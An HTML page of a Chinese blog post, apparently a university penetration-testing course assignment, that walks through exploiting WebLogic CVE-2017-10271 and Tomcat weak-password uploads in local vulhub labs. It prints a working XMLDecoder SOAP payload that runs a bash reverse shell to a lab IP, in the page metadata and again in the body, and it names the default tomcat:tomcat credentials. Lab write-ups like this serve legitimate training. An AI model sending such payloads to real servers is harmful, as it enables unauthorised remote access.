<!DOCTYPE html>
<html lang="zh" dir="ltr">
    <head><meta charset='utf-8'>
<meta name='viewport' content='width=device-width, initial-scale=1'><meta name='description' content="第一次作业目标 CVE-2017-10271（利用漏洞接口写入webshell或反弹shell） Tomcat弱口令后台上传（爆破弱口令，后台部署war包拿到webshell） 配置环境 从kali官网下载针对Vmware的虚拟机压缩包后，在虚拟机目录下解压，导入至Vmware中启动，默认用户名及密码均为kali。\n在kali中安装docker.io和docker-compose，这里已经提前安装成功。\n拉取CVE-2017-10271镜像，这里也已经提前下载过，只展示启动成功的截图。\n拉取tomcat8镜像，可见两个镜像的实例都运行成功。\n进行渗透 虚拟机的ip地址为192.168.200.134，因此通过如下地址即可访问这两个服务。\nhttp://192.168.200.134:7001/\nhttp://192.168.200.134:8080/manager/html默认账户密码为tomcat:tomcat\nWebLogic/CVE-2017-10271 XMLDecoder反序列化漏洞 WebLogic/CVE-2017-10271漏洞原理 漏洞产生的原因大致是Weblogic的WLS Security组件对外提供webservice服务，其中使用了XMLDecoder来解析用户传入的XML数据，在解析的过程中出现反序列化漏洞，导致可执行任意命令。攻击者发送精心构造的xml数据甚至能通过反弹shell拿到权限。\n获取基础GET包体 使用burp内嵌浏览器访问http://192.168.200.134:7001/wls-wsat/CoordinatorPortType，将数据包发送到Repeater。\n在Repeater中修改该数据包内容。即添加如下内容，同时将GET方法改为POST：\nContent-Type: text/xml Content-Length: 633 &lt;soapenv:Envelope xmlns:soapenv=&#34;http://schemas.xmlsoap.org/soap/envelope/&#34;&gt; &lt;soapenv:Header&gt; &lt;work:WorkContext xmlns:work=&#34;http://bea.com/2004/06/soap/workarea/&#34;&gt; &lt;java version=&#34;1.4.0&#34; class=&#34;java.beans.XMLDecoder&#34;&gt; &lt;void class=&#34;java.lang.ProcessBuilder&#34;&gt; &lt;array class=&#34;java.lang.String&#34; length=&#34;3&#34;&gt; &lt;void index=&#34;0&#34;&gt; &lt;string&gt;/bin/bash&lt;/string&gt; &lt;/void&gt; &lt;void index=&#34;1&#34;&gt; &lt;string&gt;-c&lt;/string&gt; &lt;/void&gt; &lt;void index=&#34;2&#34;&gt; &lt;string&gt;bash -i &gt;&amp; /dev/tcp/172.22.0.1/21 0&gt;&amp;1&lt;/string&gt; &lt;/void&gt; &lt;/array&gt; &lt;void method=&#34;start&#34;/&gt;&lt;/void&gt; &lt;/java&gt; &lt;/work:WorkContext&gt; &lt;/soapenv:Header&gt; &lt;soapenv:Body/&gt; &lt;/soapenv:Envelope&gt; 分析xml 攻击目标：\n">
<title>【武大网络对抗实训/第二周】第一次作业：CVE-2017-10271与Tomcat弱口令后台上传</title>

<link rel='canonical' href='https://xingfend.github.io/blog-by-hugo/post/wldk-week2/'>

<link rel="stylesheet" href="/blog-by-hugo/scss/style.min.4d1f1d0ba0946642521204c22cac9e95a334e06a474fd46b82cd09992c69e726.css"><meta property='og:title' content="【武大网络对抗实训/第二周】第一次作业：CVE-2017-10271与Tomcat弱口令后台上传">
<meta property='og:description' content="第一次作业目标 CVE-2017-10271（利用漏洞接口写入webshell或反弹shell） Tomcat弱口令后台上传（爆破弱口令，后台部署war包拿到webshell） 配置环境 从kali官网下载针对Vmware的虚拟机压缩包后，在虚拟机目录下解压，导入至Vmware中启动，默认用户名及密码均为kali。\n在kali中安装docker.io和docker-compose，这里已经提前安装成功。\n拉取CVE-2017-10271镜像，这里也已经提前下载过，只展示启动成功的截图。\n拉取tomcat8镜像，可见两个镜像的实例都运行成功。\n进行渗透 虚拟机的ip地址为192.168.200.134，因此通过如下地址即可访问这两个服务。\nhttp://192.168.200.134:7001/\nhttp://192.168.200.134:8080/manager/html默认账户密码为tomcat:tomcat\nWebLogic/CVE-2017-10271 XMLDecoder反序列化漏洞 WebLogic/CVE-2017-10271漏洞原理 漏洞产生的原因大致是Weblogic的WLS Security组件对外提供webservice服务，其中使用了XMLDecoder来解析用户传入的XML数据，在解析的过程中出现反序列化漏洞，导致可执行任意命令。攻击者发送精心构造的xml数据甚至能通过反弹shell拿到权限。\n获取基础GET包体 使用burp内嵌浏览器访问http://192.168.200.134:7001/wls-wsat/CoordinatorPortType，将数据包发送到Repeater。\n在Repeater中修改该数据包内容。即添加如下内容，同时将GET方法改为POST：\nContent-Type: text/xml Content-Length: 633 &lt;soapenv:Envelope xmlns:soapenv=&#34;http://schemas.xmlsoap.org/soap/envelope/&#34;&gt; &lt;soapenv:Header&gt; &lt;work:WorkContext xmlns:work=&#34;http://bea.com/2004/06/soap/workarea/&#34;&gt; &lt;java version=&#34;1.4.0&#34; class=&#34;java.beans.XMLDecoder&#34;&gt; &lt;void class=&#34;java.lang.ProcessBuilder&#34;&gt; &lt;array class=&#34;java.lang.String&#34; length=&#34;3&#34;&gt; &lt;void index=&#34;0&#34;&gt; &lt;string&gt;/bin/bash&lt;/string&gt; &lt;/void&gt; &lt;void index=&#34;1&#34;&gt; &lt;string&gt;-c&lt;/string&gt; &lt;/void&gt; &lt;void index=&#34;2&#34;&gt; &lt;string&gt;bash -i &gt;&amp; /dev/tcp/172.22.0.1/21 0&gt;&amp;1&lt;/string&gt; &lt;/void&gt; &lt;/array&gt; &lt;void method=&#34;start&#34;/&gt;&lt;/void&gt; &lt;/java&gt; &lt;/work:WorkContext&gt; &lt;/soapenv:Header&gt; &lt;soapenv:Body/&gt; &lt;/soapenv:Envelope&gt; 分析xml 攻击目标：\n">
<meta property='og:url' content='https://xingfend.github.io/blog-by-hugo/post/wldk-week2/'>
<meta property='og:site_name' content='远楒'>
<meta property='og:type' content='article'><meta property='article:section' content='Post' /><meta property='article:tag' content='渗透测试' /><meta property='article:published_time' content='2025-03-04T17:23:23&#43;08:00'/><meta property='article:modified_time' content='2026-04-26T14:52:27&#43;08:00'/>
<meta name="twitter:title" content="【武大网络对抗实训/第二周】第一次作业：CVE-2017-10271与Tomcat弱口令后台上传">
<meta name="twitter:description" content="第一次作业目标 CVE-2017-10271（利用漏洞接口写入webshell或反弹shell） Tomcat弱口令后台上传（爆破弱口令，后台部署war包拿到webshell） 配置环境 从kali官网下载针对Vmware的虚拟机压缩包后，在虚拟机目录下解压，导入至Vmware中启动，默认用户名及密码均为kali。\n在kali中安装docker.io和docker-compose，这里已经提前安装成功。\n拉取CVE-2017-10271镜像，这里也已经提前下载过，只展示启动成功的截图。\n拉取tomcat8镜像，可见两个镜像的实例都运行成功。\n进行渗透 虚拟机的ip地址为192.168.200.134，因此通过如下地址即可访问这两个服务。\nhttp://192.168.200.134:7001/\nhttp://192.168.200.134:8080/manager/html默认账户密码为tomcat:tomcat\nWebLogic/CVE-2017-10271 XMLDecoder反序列化漏洞 WebLogic/CVE-2017-10271漏洞原理 漏洞产生的原因大致是Weblogic的WLS Security组件对外提供webservice服务，其中使用了XMLDecoder来解析用户传入的XML数据，在解析的过程中出现反序列化漏洞，导致可执行任意命令。攻击者发送精心构造的xml数据甚至能通过反弹shell拿到权限。\n获取基础GET包体 使用burp内嵌浏览器访问http://192.168.200.134:7001/wls-wsat/CoordinatorPortType，将数据包发送到Repeater。\n在Repeater中修改该数据包内容。即添加如下内容，同时将GET方法改为POST：\nContent-Type: text/xml Content-Length: 633 &lt;soapenv:Envelope xmlns:soapenv=&#34;http://schemas.xmlsoap.org/soap/envelope/&#34;&gt; &lt;soapenv:Header&gt; &lt;work:WorkContext xmlns:work=&#34;http://bea.com/2004/06/soap/workarea/&#34;&gt; &lt;java version=&#34;1.4.0&#34; class=&#34;java.beans.XMLDecoder&#34;&gt; &lt;void class=&#34;java.lang.ProcessBuilder&#34;&gt; &lt;array class=&#34;java.lang.String&#34; length=&#34;3&#34;&gt; &lt;void index=&#34;0&#34;&gt; &lt;string&gt;/bin/bash&lt;/string&gt; &lt;/void&gt; &lt;void index=&#34;1&#34;&gt; &lt;string&gt;-c&lt;/string&gt; &lt;/void&gt; &lt;void index=&#34;2&#34;&gt; &lt;string&gt;bash -i &gt;&amp; /dev/tcp/172.22.0.1/21 0&gt;&amp;1&lt;/string&gt; &lt;/void&gt; &lt;/array&gt; &lt;void method=&#34;start&#34;/&gt;&lt;/void&gt; &lt;/java&gt; &lt;/work:WorkContext&gt; &lt;/soapenv:Header&gt; &lt;soapenv:Body/&gt; &lt;/soapenv:Envelope&gt; 分析xml 攻击目标：\n">
    <link rel="shortcut icon" href="/blog-by-hugo/favicon.ico" />

    </head>
    <body class="
    article-page
    ">
    <script>
        (function() {
            const colorSchemeKey = 'StackColorScheme';
            if(!localStorage.getItem(colorSchemeKey)){
                localStorage.setItem(colorSchemeKey, "auto");
            }
        })();
    </script><script>
    (function() {
        const colorSchemeKey = 'StackColorScheme';
        const colorSchemeItem = localStorage.getItem(colorSchemeKey);
        const supportDarkMode = window.matchMedia('(prefers-color-scheme: dark)').matches === true;

        if (colorSchemeItem == 'dark' || colorSchemeItem === 'auto' && supportDarkMode) {
            

            document.documentElement.dataset.scheme = 'dark';
        } else {
            document.documentElement.dataset.scheme = 'light';
        }
    })();
</script>
<div class="container main-container flex on-phone--column extended"><aside class="sidebar left-sidebar sticky ">
    <button class="hamburger hamburger--spin" type="button" id="toggle-menu" aria-label="Toggle Menu">
        <span class="hamburger-box">
            <span class="hamburger-inner"></span>
        </span>
    </button>

    <header>
        
            
            <figure class="site-avatar">
                <a href="/blog-by-hugo/">
                
                    

                    
                        
                        <img src="/blog-by-hugo/img/avatar_hu_d5cb2293594012db.png" width="300"
                            height="279" class="site-logo" loading="lazy" alt="Avatar">
                    
                
                </a>
                
                    <span class="emoji">😉</span>
                
            </figure>
            
        

        <div class="site-meta">
            <h1 class="site-name"><a href="/blog-by-hugo">远楒</a></h1>
            <h2 class="site-description">星分.</h2>
        </div>
    </header><ol class="menu-social">
            
                <li>
                    <a
                        href='https://space.bilibili.com/473214036'
                        target="_blank"
                        title="Bilibili"
                        rel="me"
                    >
                        
                        
                            <svg class="icon" style="width: 24;height: 24;vertical-align: middle;fill: currentColor;overflow: hidden;" viewBox="0 0 2299 1024" version="1.1" xmlns="http://www.w3.org/2000/svg" p-id="1461"><path d="M1775.840814 322.588002c6.0164 1.002733 53.144869-9.525967 55.150336-6.016401 3.0082 4.5123 24.065601 155.92504 18.550567 156.927774s-44.621635 10.027334-44.621635 10.027334c-3.0082-20.556034-28.577901-147.903173-29.079268-160.938707m75.205003-14.539634l20.556034 162.944174c10.5287-0.501367 53.144869-3.509567 57.155803-4.010934-6.0164-61.668103-16.545101-158.933241-16.545101-158.93324-20.054668-4.010934-41.112069-4.010934-61.166736 0m-40.610702 226.116376s92.752838-23.564234 126.344406-12.0328c17.046467 61.668103 48.131202 407.611118 51.139402 421.649386-21.057401 2.506833-90.246004 8.523234-95.761037 10.027333-4.5123-26.071068-81.72277-403.098818-81.722771-419.643919m343.436183-207.565809c5.515034 1.5041 54.648969-5.013667 55.150335-1.5041 1.002733 12.032801 6.0164 157.42914 0.501367 157.930507s-44.621635 4.010934-44.621635 4.010934c-1.002733-20.054668-12.032801-146.90044-11.030067-160.437341m75.70637-4.010933l4.010933 160.938707c10.5287 0 52.643502 2.506833 57.155803 2.005467-1.002733-61.668103 0-158.933241 0-158.933241-20.054668-3.509567-40.610702-5.013667-61.166736-4.010933m-64.676303 216.089043s94.758304-12.534167 126.845772 2.506833c7.019134 72.196803 6.0164 408.613852 7.019134 422.652119-21.558768 0-90.246004 1.002733-95.761038 2.005467-1.002733-26.071068-39.607968-410.619319-38.103868-427.164419m-220.099977-413.627519c54.648969 278.759879 96.262404 755.058234 97.766504 785.641602 0 0 43.117535 1.002733 91.750105 4.010934C2105.740095 614.383415 2070.644427 134.575493 2071.145794 119.033126c-12.032801-13.536901-126.344406 6.0164-126.344406 6.0164m-120.328005 659.297196c-10.5287-78.213204-290.291313-166.955108-447.720454-138.377206 0 0-19.553301-172.470141-27.073801-339.425248-6.517767-143.390873-1.002733-282.770813 0.501366-305.833681-10.5287-7.5205-123.837572 46.627102-185.004308 69.188603 0 0 73.199537 309.844614 126.344406 952.59671 0 0 84.730971 9.0246 230.12731-19.051934s317.365114-115.815705 302.825481-219.097244m-341.932083 140.88404l-24.566967-176.982441c6.0164-3.0082 156.927774 53.144869 172.971507 63.172203-2.506833 11.030067-148.40454 113.810238-148.40454 113.810238M610.664628 322.588002c6.0164 1.002733 53.144869-9.525967 55.150335-6.016401 3.0082 4.5123 24.065601 155.92504 18.550568 156.927774s-44.621635 10.027334-44.621635 10.027334c-3.0082-20.556034-28.577901-147.903173-29.079268-160.938707m75.205003-14.539634l20.556034 162.944174c10.5287-0.501367 53.144869-3.509567 57.155803-4.010934-6.517767-61.668103-16.545101-158.933241-16.545101-158.93324-20.054668-4.010934-41.112069-4.010934-61.166736 0m-40.610702 226.116376s92.752838-23.564234 126.344406-12.0328c17.046467 61.668103 48.131202 407.611118 51.139402 421.649386-21.057401 2.506833-90.246004 8.523234-95.761037 10.027333-4.5123-26.071068-81.72277-403.098818-81.722771-419.643919m343.436182-207.565809c5.515034 1.5041 54.648969-5.013667 55.150336-1.5041 1.002733 12.032801 6.0164 157.42914 0.501367 157.930507s-44.621635 4.010934-44.621635 4.010934c-1.002733-20.054668-11.531434-146.90044-11.030068-160.437341m75.706371-4.010933l4.010933 160.938707c10.5287 0 52.643502 2.506833 57.155803 2.005467-1.002733-61.668103 0-158.933241 0-158.933241-20.054668-3.509567-40.610702-4.5123-61.166736-4.010933m-64.676303 216.089043s94.758304-12.534167 126.845772 2.506833c7.019134 72.196803 6.0164 408.613852 7.019134 422.652119-21.558768 0-90.246004 1.002733-95.761038 2.005467-0.501367-26.071068-39.607968-410.619319-38.103868-427.164419m-220.099977-413.627519c54.648969 278.759879 96.262404 755.058234 97.766504 785.641602 0 0 43.117535 1.002733 91.750105 4.010934-28.577901-300.318647-63.67357-780.126569-63.172203-796.170303-12.032801-13.035534-126.344406 6.517767-126.344406 6.517767m-120.328005 659.297196c-10.5287-78.213204-290.291313-166.955108-447.720454-138.377206 0 0-19.553301-172.470141-27.073801-339.425248-6.517767-143.390873-1.002733-282.770813 0.501366-305.833681C174.475608-6.308547 61.166736 47.337689 0 69.89919c0 0 73.199537 309.844614 126.344406 952.59671 0 0 84.730971 9.0246 230.12731-19.051934s317.365114-115.815705 302.825481-219.097244m-341.932083 140.88404l-24.566967-176.982441c6.0164-3.0082 156.927774 53.144869 172.971507 63.172203-2.506833 11.030067-148.40454 113.810238-148.40454 113.810238" p-id="1462"></path></svg>
                        
                    </a>
                </li>
            
                <li>
                    <a
                        href='https://github.com/xingfend'
                        target="_blank"
                        title="GitHub"
                        rel="me"
                    >
                        
                        
                            <?xml version="1.0" encoding="UTF-8"?><svg width="24" height="24" viewBox="0 0 48 48" fill="none" xmlns="http://www.w3.org/2000/svg"><path d="M29.3444 30.4765C31.7481 29.977 33.9292 29.1108 35.6247 27.8391C38.5202 25.6676 40 22.3136 40 18.9999C40 16.6752 39.1187 14.505 37.5929 12.6668C36.7427 11.6425 39.2295 3.99989 37.02 5.02919C34.8105 6.05848 31.5708 8.33679 29.8726 7.83398C28.0545 7.29565 26.0733 6.99989 24 6.99989C22.1992 6.99989 20.4679 7.22301 18.8526 7.6344C16.5046 8.23237 14.2591 5.99989 12 5.02919C9.74086 4.05848 10.9736 11.9632 10.3026 12.7944C8.84119 14.6051 8 16.7288 8 18.9999C8 22.3136 9.79086 25.6676 12.6863 27.8391C14.6151 29.2857 17.034 30.2076 19.7401 30.6619" stroke="#707070" stroke-width="4" stroke-linecap="round"/><path d="M19.7397 30.6619C18.5812 31.937 18.002 33.1478 18.002 34.2944C18.002 35.441 18.002 38.3464 18.002 43.0106" stroke="#707070" stroke-width="4" stroke-linecap="round"/><path d="M29.3446 30.4766C30.4423 31.9174 30.9912 33.211 30.9912 34.3576C30.9912 35.5042 30.9912 38.3885 30.9912 43.0107" stroke="#707070" stroke-width="4" stroke-linecap="round"/><path d="M6 31.2155C6.89887 31.3254 7.56554 31.7387 8 32.4554C8.65169 33.5303 11.0742 37.518 13.8251 37.518C15.6591 37.518 17.0515 37.518 18.0024 37.518" stroke="#707070" stroke-width="4" stroke-linecap="round"/></svg>
                        
                    </a>
                </li>
            
        </ol><ol class="menu" id="main-menu">
        
        
        
        <li >
            <a href='/blog-by-hugo/' >
                
                
                
                    <svg xmlns="http://www.w3.org/2000/svg" class="icon icon-tabler icon-tabler-home" width="24" height="24" viewBox="0 0 24 24" stroke-width="2" stroke="currentColor" fill="none" stroke-linecap="round" stroke-linejoin="round">
  <path stroke="none" d="M0 0h24v24H0z"/>
  <polyline points="5 12 3 12 12 3 21 12 19 12" />
  <path d="M5 12v7a2 2 0 0 0 2 2h10a2 2 0 0 0 2 -2v-7" />
  <path d="M9 21v-6a2 2 0 0 1 2 -2h2a2 2 0 0 1 2 2v6" />
</svg>



                
                <span>主页</span>
            </a>
        </li>
        
        
        <li >
            <a href='/blog-by-hugo/page/archives/' >
                
                
                
                    <svg xmlns="http://www.w3.org/2000/svg" class="icon icon-tabler icon-tabler-archive" width="24" height="24" viewBox="0 0 24 24" stroke-width="2" stroke="currentColor" fill="none" stroke-linecap="round" stroke-linejoin="round">
  <path stroke="none" d="M0 0h24v24H0z"/>
  <rect x="3" y="4" width="18" height="4" rx="2" />
  <path d="M5 8v10a2 2 0 0 0 2 2h10a2 2 0 0 0 2 -2v-10" />
  <line x1="10" y1="12" x2="14" y2="12" />
</svg>



                
                <span>归档</span>
            </a>
        </li>
        
        
        <li >
            <a href='/blog-by-hugo/page/search/' >
                
                
                
                    <svg xmlns="http://www.w3.org/2000/svg" class="icon icon-tabler icon-tabler-search" width="24" height="24" viewBox="0 0 24 24" stroke-width="2" stroke="currentColor" fill="none" stroke-linecap="round" stroke-linejoin="round">
  <path stroke="none" d="M0 0h24v24H0z"/>
  <circle cx="10" cy="10" r="7" />
  <line x1="21" y1="21" x2="15" y2="15" />
</svg>



                
                <span>搜索</span>
            </a>
        </li>
        
        
        <li >
            <a href='/blog-by-hugo/page/about/' >
                
                
                
                    <svg xmlns="http://www.w3.org/2000/svg" class="icon icon-tabler icon-tabler-user" width="24" height="24" viewBox="0 0 24 24" stroke-width="2" stroke="currentColor" fill="none" stroke-linecap="round" stroke-linejoin="round">
  <path stroke="none" d="M0 0h24v24H0z"/>
  <circle cx="12" cy="7" r="4" />
  <path d="M6 21v-2a4 4 0 0 1 4 -4h4a4 4 0 0 1 4 4v2" />
</svg>



                
                <span>关于</span>
            </a>
        </li>
        
        
        <li >
            <a href='/blog-by-hugo/page/links/' >
                
                
                
                    <svg xmlns="http://www.w3.org/2000/svg" class="icon icon-tabler icon-tabler-link" width="24" height="24" viewBox="0 0 24 24" stroke-width="2" stroke="currentColor" fill="none" stroke-linecap="round" stroke-linejoin="round">
  <path stroke="none" d="M0 0h24v24H0z"/>
  <path d="M10 14a3.5 3.5 0 0 0 5 0l4 -4a3.5 3.5 0 0 0 -5 -5l-.5 .5" />
  <path d="M14 10a3.5 3.5 0 0 0 -5 0l-4 4a3.5 3.5 0 0 0 5 5l.5 -.5" />
</svg>



                
                <span>链接</span>
            </a>
        </li>
        
        <li class="menu-bottom-section">
            <ol class="menu">

                
                    <li id="dark-mode-toggle">
                        <svg xmlns="http://www.w3.org/2000/svg" class="icon icon-tabler icon-tabler-toggle-left" width="24" height="24" viewBox="0 0 24 24" stroke-width="2" stroke="currentColor" fill="none" stroke-linecap="round" stroke-linejoin="round">
  <path stroke="none" d="M0 0h24v24H0z"/>
  <circle cx="8" cy="12" r="2" />
  <rect x="2" y="6" width="20" height="12" rx="6" />
</svg>



                        <svg xmlns="http://www.w3.org/2000/svg" class="icon icon-tabler icon-tabler-toggle-right" width="24" height="24" viewBox="0 0 24 24" stroke-width="2" stroke="currentColor" fill="none" stroke-linecap="round" stroke-linejoin="round">
  <path stroke="none" d="M0 0h24v24H0z"/>
  <circle cx="16" cy="12" r="2" />
  <rect x="2" y="6" width="20" height="12" rx="6" />
</svg>



                        <span>Dark Mode</span>
                    </li>
                
                
            </ol>
        </li>
    </ol>
</aside>

    <aside class="sidebar right-sidebar sticky">
        
            
                
    <section class="widget archives">
        <div class="widget-icon">
            <svg xmlns="http://www.w3.org/2000/svg" class="icon icon-tabler icon-tabler-hash" width="24" height="24" viewBox="0 0 24 24" stroke-width="2" stroke="currentColor" fill="none" stroke-linecap="round" stroke-linejoin="round">
  <path stroke="none" d="M0 0h24v24H0z"/>
  <line x1="5" y1="9" x2="19" y2="9" />
  <line x1="5" y1="15" x2="19" y2="15" />
  <line x1="11" y1="4" x2="7" y2="20" />
  <line x1="17" y1="4" x2="13" y2="20" />
</svg>



        </div>
        <h2 class="widget-title section-title">Table of contents</h2>

        <div class="widget--toc">
            <nav id="TableOfContents">
  <ul>
    <li><a href="#第一次作业目标">第一次作业目标</a></li>
    <li><a href="#配置环境">配置环境</a></li>
    <li><a href="#进行渗透">进行渗透</a>
      <ul>
        <li></li>
        <li><a href="#tomcattomcat8弱口令后台上传">tomcat/tomcat8弱口令后台上传</a></li>
      </ul>
    </li>
  </ul>
</nav>
        </div>
    </section>

            
        
            
                
<section class="widget curTags">
    <div class="widget-icon">
        <svg xmlns="http://www.w3.org/2000/svg" class="icon icon-tabler icon-tabler-tag" width="24" height="24" viewBox="0 0 24 24" stroke-width="2" stroke="currentColor" fill="none" stroke-linecap="round" stroke-linejoin="round">
  <path stroke="none" d="M0 0h24v24H0z"/>
  <path d="M11 3L20 12a1.5 1.5 0 0 1 0 2L14 20a1.5 1.5 0 0 1 -2 0L3 11v-4a4 4 0 0 1 4 -4h4" />
  <circle cx="9" cy="9" r="2" />
</svg>



    </div>
    <h2 class="widget-title section-title">Tags of current blog</h2>
    <div class="curTags-tags">
        
            <a href="/blog-by-hugo/tags/%E6%B8%97%E9%80%8F%E6%B5%8B%E8%AF%95/">
                渗透测试
            </a>
        
    </div>
</section>

            
        
    </aside>


            <main class="main full-width">
    <article class="main-article">
    <header class="article-header">

    <div class="article-details">
    
    <header class="article-category">
        
            <a href="/blog-by-hugo/categories/course/" style="background-color: #2a9d8f; color: #fff;">
                课程作业
            </a>
        
    </header>
    

    <div class="article-title-wrapper">
        <h2 class="article-title">
            <a href="/blog-by-hugo/post/wldk-week2/">【武大网络对抗实训/第二周】第一次作业：CVE-2017-10271与Tomcat弱口令后台上传</a>
        </h2>

        
    </div>

    
    
    
    
    <footer class="article-time">
        
            <div>
                <svg xmlns="http://www.w3.org/2000/svg" class="icon icon-tabler icon-tabler-calendar-time" width="56" height="56" viewBox="0 0 24 24" stroke-width="2" stroke="currentColor" fill="none" stroke-linecap="round" stroke-linejoin="round">
  <path stroke="none" d="M0 0h24v24H0z"/>
  <path d="M11.795 21h-6.795a2 2 0 0 1 -2 -2v-12a2 2 0 0 1 2 -2h12a2 2 0 0 1 2 2v4" />
  <circle cx="18" cy="18" r="4" />
  <path d="M15 3v4" />
  <path d="M7 3v4" />
  <path d="M3 11h16" />
  <path d="M18 16.496v1.504l1 1" />
</svg>
                <time class="article-time--published">Mar 04, 2025</time>
            </div>
        

        
        <div class="article-lastmod">
                <svg xmlns="http://www.w3.org/2000/svg" class="icon icon-tabler icon-tabler-clock" width="24" height="24" viewBox="0 0 24 24" stroke-width="2" stroke="currentColor" fill="none" stroke-linecap="round" stroke-linejoin="round">
  <path stroke="none" d="M0 0h24v24H0z"/>
  <circle cx="12" cy="12" r="9" />
  <polyline points="12 7 12 12 15 15" />
</svg>



                <time>
                    Apr 26, 2026 14:52 &#43;0800
                </time>
            </div>
            <div>
                <svg xmlns="http://www.w3.org/2000/svg" class="icon icon-tabler icon-tabler-clock" width="24" height="24" viewBox="0 0 24 24" stroke-width="2" stroke="currentColor" fill="none" stroke-linecap="round" stroke-linejoin="round">
  <path stroke="none" d="M0 0h24v24H0z"/>
  <circle cx="12" cy="12" r="9" />
  <polyline points="12 7 12 12 15 15" />
</svg>



                <time class="article-time--reading">
                    1 minute read
                </time>
            </div>
        

    </footer>
    

    
</div>

</header>

    <section class="article-content">
    
    
    <h2 id="第一次作业目标">第一次作业目标
</h2><ul>
<li><a class="link" href="https://vulhub.org/#/environments/weblogic/CVE-2017-10271/"  target="_blank" rel="noopener"
    >CVE-2017-10271（利用漏洞接口写入webshell或反弹shell）</a></li>
<li><a class="link" href="https://vulhub.org/#/environments/tomcat/tomcat8/"  target="_blank" rel="noopener"
    >Tomcat弱口令后台上传（爆破弱口令，后台部署war包拿到webshell）</a></li>
</ul>
<h2 id="配置环境">配置环境
</h2><p>    从kali官网下载针对Vmware的虚拟机压缩包后，在虚拟机目录下解压，导入至Vmware中启动，默认用户名及密码均为<code>kali</code>。</p>
<p>    在kali中安装docker.io和docker-compose，这里已经提前安装成功。</p>
<p><img src="/blog-by-hugo/post/wldk-week2/img/2025-03-04-17-55-12-image.png"
	width="522"
	height="189"
	srcset="/blog-by-hugo/post/wldk-week2/img/2025-03-04-17-55-12-image_hu_b60cf0c53dac116c.png 480w, /blog-by-hugo/post/wldk-week2/img/2025-03-04-17-55-12-image_hu_8c2225dd785d9b3b.png 1024w"
	loading="lazy"
	
	
		class="gallery-image" 
		data-flex-grow="276"
		data-flex-basis="662px"
	
></p>
<p>    拉取CVE-2017-10271镜像，这里也已经提前下载过，只展示启动成功的截图。</p>
<p><img src="/blog-by-hugo/post/wldk-week2/img/image.png"
	width="1454"
	height="278"
	srcset="/blog-by-hugo/post/wldk-week2/img/image_hu_22edb8fc4e5872dd.png 480w, /blog-by-hugo/post/wldk-week2/img/image_hu_da78bc5b106b20a5.png 1024w"
	loading="lazy"
	
		alt="alt text"
	
	
		class="gallery-image" 
		data-flex-grow="523"
		data-flex-basis="1255px"
	
></p>
<p>    拉取tomcat8镜像，可见两个镜像的实例都运行成功。</p>
<p><img src="/blog-by-hugo/post/wldk-week2/img/2025-03-04-18-03-58-image.png"
	width="1754"
	height="662"
	srcset="/blog-by-hugo/post/wldk-week2/img/2025-03-04-18-03-58-image_hu_1b986e671a42a81a.png 480w, /blog-by-hugo/post/wldk-week2/img/2025-03-04-18-03-58-image_hu_9be9b8803d520e95.png 1024w"
	loading="lazy"
	
	
		class="gallery-image" 
		data-flex-grow="264"
		data-flex-basis="635px"
	
></p>
<h2 id="进行渗透">进行渗透
</h2><p>    虚拟机的ip地址为<code>192.168.200.134</code>，因此通过如下地址即可访问这两个服务。</p>
<ul>
<li>
<p><code>http://192.168.200.134:7001/</code></p>
</li>
<li>
<p><code>http://192.168.200.134:8080/manager/html</code>默认账户密码为<code>tomcat:tomcat</code></p>
</li>
</ul>
<p><img src="/blog-by-hugo/post/wldk-week2/img/2025-03-04-18-13-07-image.png"
	width="2858"
	height="766"
	srcset="/blog-by-hugo/post/wldk-week2/img/2025-03-04-18-13-07-image_hu_96937ae3573e00eb.png 480w, /blog-by-hugo/post/wldk-week2/img/2025-03-04-18-13-07-image_hu_79823f9981443da6.png 1024w"
	loading="lazy"
	
	
		class="gallery-image" 
		data-flex-grow="373"
		data-flex-basis="895px"
	
></p>
<p><img src="/blog-by-hugo/post/wldk-week2/img/2025-03-04-18-14-28-image.png"
	width="2860"
	height="1429"
	srcset="/blog-by-hugo/post/wldk-week2/img/2025-03-04-18-14-28-image_hu_fa36c2e04177cc29.png 480w, /blog-by-hugo/post/wldk-week2/img/2025-03-04-18-14-28-image_hu_745f721236617a31.png 1024w"
	loading="lazy"
	
	
		class="gallery-image" 
		data-flex-grow="200"
		data-flex-basis="480px"
	
></p>
<h4 id="weblogiccve-2017-10271-xmldecoder反序列化漏洞">WebLogic/CVE-2017-10271 XMLDecoder反序列化漏洞
</h4><h5 id="weblogiccve-2017-10271漏洞原理">WebLogic/CVE-2017-10271漏洞原理
</h5><p>    漏洞产生的原因大致是Weblogic的WLS Security组件对外提供webservice服务，其中使用了XMLDecoder来解析用户传入的XML数据，在解析的过程中出现反序列化漏洞，导致可执行任意命令。攻击者发送精心构造的xml数据甚至能通过反弹shell拿到权限。</p>
<h5 id="获取基础get包体">获取基础GET包体
</h5><p>    使用burp内嵌浏览器访问<code>http://192.168.200.134:7001/wls-wsat/CoordinatorPortType</code>，将数据包发送到Repeater。</p>
<p><img src="/blog-by-hugo/post/wldk-week2/img/2025-03-04-19-02-35-image.png"
	width="1203"
	height="406"
	srcset="/blog-by-hugo/post/wldk-week2/img/2025-03-04-19-02-35-image_hu_5ea795c2630aa530.png 480w, /blog-by-hugo/post/wldk-week2/img/2025-03-04-19-02-35-image_hu_2eedac69b01f6c88.png 1024w"
	loading="lazy"
	
	
		class="gallery-image" 
		data-flex-grow="296"
		data-flex-basis="711px"
	
></p>
<p>    在Repeater中修改该数据包内容。即添加如下内容，<mark>同时将GET方法改为POST</mark>：</p>
<div class="highlight"><pre tabindex="0" class="chroma"><code class="language-xml" data-lang="xml"><span class="line"><span class="cl">Content-Type: text/xml
</span></span><span class="line"><span class="cl">Content-Length: 633
</span></span><span class="line"><span class="cl">
</span></span><span class="line"><span class="cl"><span class="nt">&lt;soapenv:Envelope</span> <span class="na">xmlns:soapenv=</span><span class="s">&#34;http://schemas.xmlsoap.org/soap/envelope/&#34;</span><span class="nt">&gt;</span> <span class="nt">&lt;soapenv:Header&gt;</span>
</span></span><span class="line"><span class="cl"><span class="nt">&lt;work:WorkContext</span> <span class="na">xmlns:work=</span><span class="s">&#34;http://bea.com/2004/06/soap/workarea/&#34;</span><span class="nt">&gt;</span>
</span></span><span class="line"><span class="cl"><span class="nt">&lt;java</span> <span class="na">version=</span><span class="s">&#34;1.4.0&#34;</span> <span class="na">class=</span><span class="s">&#34;java.beans.XMLDecoder&#34;</span><span class="nt">&gt;</span>
</span></span><span class="line"><span class="cl"><span class="nt">&lt;void</span> <span class="na">class=</span><span class="s">&#34;java.lang.ProcessBuilder&#34;</span><span class="nt">&gt;</span>
